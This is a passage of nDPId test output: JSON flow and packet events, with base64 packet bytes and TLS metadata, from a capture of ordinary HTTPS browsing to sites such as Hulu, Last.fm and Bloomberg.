AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
-00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":373,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482786097,"flow_last_seen":1646482786140,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482786140,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":374,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482786097,"flow_last_seen":1646482786188,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482786188,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-01214{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":376,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482786097,"flow_last_seen":1646482786188,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3831,"flow_avg_l4_payload_len":638,"midstream":0,"thread_ts_msec":1646482786188,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.tuenti.com","server_names":"*.tuenti.com,tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=ES, L=Madrid, O=Tuenti Technologies S.L., CN=*.tuenti.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"89:B8:FA:C7:22:04:D2:BE:C5:6E:59:10:31:67:42:B1:3F:6D:F8:3B"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":379,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482791144,"flow_last_seen":1646482791144,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482791144,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1646482791144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482791144,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8FF5AAEAGQPrAqAGAX2XD1sjoAbs9AWSXAAAAAKAC+vBfJgAAAgQFtAQCCAoz72hZAAAAAAEDAwc="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1646482791167,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482791167,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADMGYlhfZcPWwKgBgAG7yOhRyYQJPQFkmKAS\/ohadwAAAgQFtAQCCAoA0SpiM+9oWQEDAwc="} -01165{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1646482791170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482791170,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5FGBAAEAGPvvAqAGAX2XD1sjoAbs9AWSYUcmECoAYAfYkYQAAAQEICjPvaHMA0SpiFgMBAgABAAH8AwPkjLny33P+mExr32cMRl62\/8RJSZlKid1V05U+ySIWLCA+yoN1VMfFXakU81pmrArAv4PMFa74gV6zhhtZIkRahgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAANAAsAAAhodWx1LmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACATY1QXYS0qh7KvKliQF74PNyaFCqlZEZicpu9ccKADKQAXAEEEtcC0kqJMuUk4fNE8PcFvshva3wSMZbKQk5Gr6YxJX1t14RCVX0X4nJLqvHYB8ofAk7LBbtBWK6qUGB5XQIzcOQArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":381,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482791144,"flow_last_seen":1646482791170,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482791170,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Hulu","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"hulu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":382,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482791144,"flow_last_seen":1646482791191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482791191,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Hulu","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"hulu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482801387,"flow_last_seen":1646482801387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482801387,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"34.96.123.111","src_port":44954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1646482801387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482801387,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8u7RAAEAGHxDAqAGAImB7b6+aAFDTrORQAAAAAKAC+vAeUwAAAgQFtAQCCAqmtsAlAAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1646482801394,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482801394,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8tJQAAHkGLLAiYHtvwKgBgABQr5rfpgWE06zkUaAS\/\/9QBgAAAgQFlgQCCArcngeAprbAJQEDAwg="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":385,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482802720,"flow_last_seen":1646482802720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482802720,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"35.201.112.136","src_port":47122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1646482802720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482802720,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8g6pAAEAGYJjAqAGAI8lwiLgSAbvaEoGzAAAAAKAC+vAuRQAAAgQFtAQCCArAZPJXAAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1646482802726,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482802726,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8b+kAAHkGetkjyXCIwKgBgAG7uBJNy0p52hKBtKAS\/\/9IWQAAAgQFlgQCCArHroD1wGTyVwEDAwg="} 
-01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1646482802732,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482802732,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5g6xAAEAGXpnAqAGAI8lwiLgSAbvaEoG0TctKeoAYAfa\/ZwAAAQEICsBk8mLHroD1FgMBAgABAAH8AwM6s1cKgDvTG3LALyk7fAmvRJX9DNZN37XWMNl1\/SdHaCCUR56oKGM2UcODstsWkptKjiMgLAJPLuO56cI3NFuiCgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAASABAAAA1rZXJ2ZS5sYXN0LmZtABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIEXwFTh8NFdQPbVwjRz3qZyMML4Z+FJITLECgKzAH2YhABcAQQROHWQ9TZ\/FNyVoueylOLPpt31B2wF8YuKZg+41\/WG\/Ucaum9xuzZgJXugnVJqsHgtbN0plSfDPGhyRi1GNW\/CAACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482802720,"flow_last_seen":1646482802732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482802732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"35.201.112.136","src_port":47122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LastFM","breed":"Fun","category":"Music"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"kerve.last.fm","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00928{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":388,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482802720,"flow_last_seen":1646482802742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646482802742,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"35.201.112.136","src_port":47122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LastFM","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.3","client_requested_server_name":"kerve.last.fm","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482825245,"flow_last_seen":1646482825245,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482825245,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"69.191.252.15","src_port":39036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1646482825245,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482825245,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8fBNAAEAGurHAqAGARb\/8D5h8AFDXP+M5AAAAAKAC+vDCpAAAAgQFtAQCCArIaWrDAAAAAAEDAwc="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1646482826257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482826257,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8fBRAAEAGurDAqAGARb\/8D5h8AFDXP+M5AAAAAKAC+vC+sAAAAgQFtAQCCArIaW63AAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1646482828277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482828277,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8fBVAAEAGuq\/AqAGARb\/8D5h8AFDXP+M5AAAAAKAC+vC2zAAAAgQFtAQCCArIaXabAAAAAAEDAwc="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":394,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482844787,"flow_last_seen":1646482844787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482844787,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1646482844787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482844787,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8DedAAEAGEf7AqAGAl2XBSamUAbtMTKsLAAAAAKAC+vDPdgAAAgQFtAQCCApUsmtnAAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1646482844795,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482844795,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGJuWXZcFJwKgBgAG7qZRSHsTXTEyrDKAS\/\/9OHAAAAgQFTAQCCAoo5zzDVLJrZwEDAwk="} 
-01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1646482844798,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482844798,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5DelAAEAGD\/\/AqAGAl2XBSamUAbtMTKsMUh7E2IAYAfYA+gAAAQEIClSya3Io5zzDFgMBAgABAAH8AwORBDzSmJ5ztCo20SFZ11gW0AoQQ4sgaFZaA3Y+KP\/wXyDr7yv9lTOmWoS6i6wF3DRKGiQ0dwIiiuA6PbPxGRgIZwAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABF3d3cuYmxvb21iZXJnLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACDquIWld0x6v\/7S4zdZ49LOkRXJqmmpTXYEodSal6cCHwAXAEEEAIPYMeBzwG1ajydlfuoJM30LuOrUqddbx+YHyLZsEMUExIIuEeju0UTUsS5CFNGsqSGbD968lENk0xLpNURtmQArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":396,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482844787,"flow_last_seen":1646482844798,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482844798,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00957{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":397,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482844787,"flow_last_seen":1646482844815,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646482844815,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01825{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":399,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482844787,"flow_last_seen":1646482844815,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4537,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1646482844815,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.bloomberg.com","server_names":"www.bloomberg.com,api.businessweek.com,api.bwbx.io,assets.bwbx.io,byzantium.bloomberg.com,cdn-mobapi.bloomberg.com,cdn-videos.bloomberg.com,cdn.gotraffic.net,charts.bloomberg.com,embeds.bloomberg.com,fastly.bloomberg.tv,feeds.bloomberg.com,fonts.gotraffic.net,staging-assets.bwbx.io,nav.bloomberg.com,sponsored.bloomberg.com,spotlight.bloomberg.com,tictoc.video,www.bbthat.com,www.bloomberg.co.jp,www.bloomberg.co.jp.shared.bloomberga.com,www.bloomberg.com.shared.bloomberga.com,www.bloombergview.com,www.citylab.com,www.citylab.com.shared.bloomberga.com,www.quicktake.video,www.tictoc.video,cdn-api.cmobile.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=New York, L=New York, O=Bloomberg LP, CN=www.bloomberg.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"88:4A:85:34:1D:E6:C0:BE:5E:C6:14:BB:BA:94:A3:55:92:BA:95:82"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":403,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482845216,"flow_last_seen":1646482845216,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482845216,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1646482845216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482845216,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ZOJAAEAG1L\/AqAGAbIvSZt62AbvYtDuvAAAAAKAC+vDuhAAAAgQFtAQCCAq3z7DKAAAAAAEDAwc="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1646482845236,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482845236,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8MSYAAPgGkHtsi9JmwKgBgAG73rYdOl\/82LQ7sKAS\/\/9A+gAAAgQFoAQCCAoefQzKt8+wygEDAwg="} 